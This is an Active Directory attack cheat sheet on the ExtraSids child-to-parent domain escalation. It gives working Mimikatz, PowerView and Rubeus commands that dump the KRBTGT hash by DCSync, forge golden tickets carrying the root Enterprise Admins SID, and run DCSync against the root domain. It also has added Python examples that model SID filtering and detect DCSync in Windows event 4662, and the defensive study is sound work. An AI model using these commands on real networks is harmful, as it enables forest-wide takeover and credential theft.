
extra-sids

This attack lets an attacker who has already compromised a child domain take over the parent domain. Within the same AD forest, the SIDHistory attribute (the ExtraSids carried in a ticket's PAC) is honoured by the parent, because SID filtering is not applied to parent/child trusts inside a forest; a ticket forged in the child domain can therefore carry the SID of a root-domain group such as Enterprise Admins.
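To make the security-relevant point concrete, the following added example (not part of the original page) models how SID filtering treats the extra SIDs in a ticket crossing a trust. It assumes constructed domain SIDs and a simplified filter rule: with SID filtering (quarantine) on, only SIDs belonging to the trusted domain survive; without it, which is the default for intra-forest parent/child trusts, every SID passes and a root-domain Enterprise Admins SID injected by the child is accepted.

```python
"""Model of SID filtering on a trust (added illustration, not Microsoft code).

Domain SIDs are constructed placeholders. The filter rule is the simplified
one used for quarantined trusts: keep only SIDs whose domain part equals the
trusted domain's SID. Intra-forest parent/child trusts are not quarantined,
which is exactly why the ExtraSids technique works.
"""

ENTERPRISE_ADMINS_RID = 519  # well-known RID; the group lives in the forest root

# Constructed sample SIDs (not real domains).
CHILD_DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
ROOT_DOMAIN_SID = "S-1-5-21-4444444444-5555555555-6666666666"


def domain_part(sid: str) -> str:
    """Return the domain identifier of an account/group SID (all but the RID)."""
    return sid.rsplit("-", 1)[0]


def filter_extra_sids(extra_sids, trusted_domain_sid, quarantined):
    """Return the SIDs the trusting domain keeps from a ticket's ExtraSids.

    quarantined=True  -> SID filtering on: foreign-domain SIDs are dropped.
    quarantined=False -> no filtering (intra-forest default): everything kept.
    """
    if not quarantined:
        return list(extra_sids)
    return [s for s in extra_sids if domain_part(s) == trusted_domain_sid]


def effective_token_sids(user_sid, extra_sids, trusted_domain_sid, quarantined):
    """SIDs that end up in the access token built from the ticket."""
    return [user_sid] + filter_extra_sids(extra_sids, trusted_domain_sid, quarantined)


def grants_enterprise_admin(sids, root_domain_sid):
    """True if the token carries the forest root's Enterprise Admins SID."""
    return f"{root_domain_sid}-{ENTERPRISE_ADMINS_RID}" in sids


def evaluate_forged_ticket(quarantined):
    """A child-domain ticket whose ExtraSids smuggle root-domain Enterprise Admins."""
    forged_user = f"{CHILD_DOMAIN_SID}-1105"              # constructed child user RID
    extra = [f"{ROOT_DOMAIN_SID}-{ENTERPRISE_ADMINS_RID}"]  # the injected SID
    token = effective_token_sids(forged_user, extra, CHILD_DOMAIN_SID, quarantined)
    return grants_enterprise_admin(token, ROOT_DOMAIN_SID)


if __name__ == "__main__":
    print("no SID filtering (intra-forest default):", evaluate_forged_ticket(False))
    print("SID filtering enabled:", evaluate_forged_ticket(True))
```

The practical consequence for defenders: the forest, not the domain, is the security boundary, so a compromised child domain must be treated as a compromise of the whole forest; enabling quarantine on an intra-forest trust is not a supported mitigation, and monitoring for the KRBTGT hash extraction and DCSync steps that follow is the realistic control.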

Obtain the child domain's KRBTGT NT hash (Mimikatz)

.\mimikatz.exe "lsadump::dcsync /user:LOGISTICS\krbtgt" exit

Get the child domain's SID (PowerView)

Get-DomainSID

Get the SID of a group in the root domain, e.g. Enterprise Admins (PowerView)

Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "<group Name>" | select distinguishedname,objectsid

Create a golden ticket carrying the root-domain group SID as an extra SID (Mimikatz)

.\mimikatz.exe "kerberos::golden /user:<username> /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:<child domain SID> /sids:<root domain group SID> /krbtgt:<krbtgt_hash> /ptt" exit
klist

Create a golden ticket with extra SIDs (Rubeus); /sids takes the SID value of the root-domain group, not its name

.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:<child domain SID> /sids:<root domain Enterprise Admins SID> /user:hacker /ptt

Perform a DCSync attack against the root domain (Mimikatz)

.\mimikatz.exe "lsadump::dcsync /user:INLANEFREIGHT\<user_name> /domain:INLANEFREIGHT.LOCAL" exit
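The DCSync step above is also the most detectable one: replicating directory changes requires the DS-Replication-Get-Changes extended rights, and Windows logs each such request as Security event 4662 naming the right's GUID. The following added example (not part of the original page) runs that detection logic over a few constructed 4662 records; the GUIDs are the real extended-rights GUIDs, while the account names, the DC inventory and the event fields are constructed placeholders.

```python
"""Flag replication (DCSync-style) requests in Windows Security event 4662.

Added example; the event records below are constructed, not captured.
Requires 'Audit Directory Service Access' to be enabled on the DCs so that
4662 is logged at all.
"""
import re

# Real extended-rights GUIDs used by directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.IGNORECASE)

# Accounts that legitimately replicate: the DCs themselves (constructed inventory).
# Add any service that replicates by design, such as an Azure AD Connect account.
KNOWN_DC_ACCOUNTS = {"INLANEFREIGHT\\DC01$", "INLANEFREIGHT\\DC02$"}

# Constructed sample events, shaped like the 4662 EventData fields.
SAMPLE_EVENTS = [
    {   # normal inter-DC replication: expected, not flagged
        "EventID": 4662, "SubjectDomainName": "INLANEFREIGHT", "SubjectUserName": "DC02$",
        "AccessMask": "0x100",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # a non-DC principal asking for Get-Changes-All: DCSync pattern
        "EventID": 4662, "SubjectDomainName": "INLANEFREIGHT", "SubjectUserName": "hacker",
        "AccessMask": "0x100",
        "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # ordinary object access with an unrelated (placeholder) property GUID
        "EventID": 4662, "SubjectDomainName": "INLANEFREIGHT", "SubjectUserName": "jsmith",
        "AccessMask": "0x10",
        "Properties": "{00000000-0000-0000-0000-000000000001}",
    },
    {   # not a 4662 at all
        "EventID": 4624, "SubjectDomainName": "INLANEFREIGHT", "SubjectUserName": "hacker",
    },
]


def replication_rights(event):
    """Names of the replication rights referenced by a 4662 event's Properties."""
    if event.get("EventID") != 4662:
        return []
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)


def find_dcsync(events, dc_accounts):
    """Return replication requests made by accounts that are not known DCs."""
    hits = []
    for ev in events:
        rights = replication_rights(ev)
        if not rights:
            continue
        account = f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}"
        if account in dc_accounts:
            continue
        hits.append({"account": account, "rights": rights})
    return hits


if __name__ == "__main__":
    for hit in find_dcsync(SAMPLE_EVENTS, KNOWN_DC_ACCOUNTS):
        print(f"possible DCSync by {hit['account']}: {', '.join(hit['rights'])}")
```

In a real deployment the allow-list should be generated from the Domain Controllers OU rather than hard-coded, and a hit should be correlated with the source host from the matching 4624 logon, since a DCSync from a workstation rather than a DC is the strongest signal.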
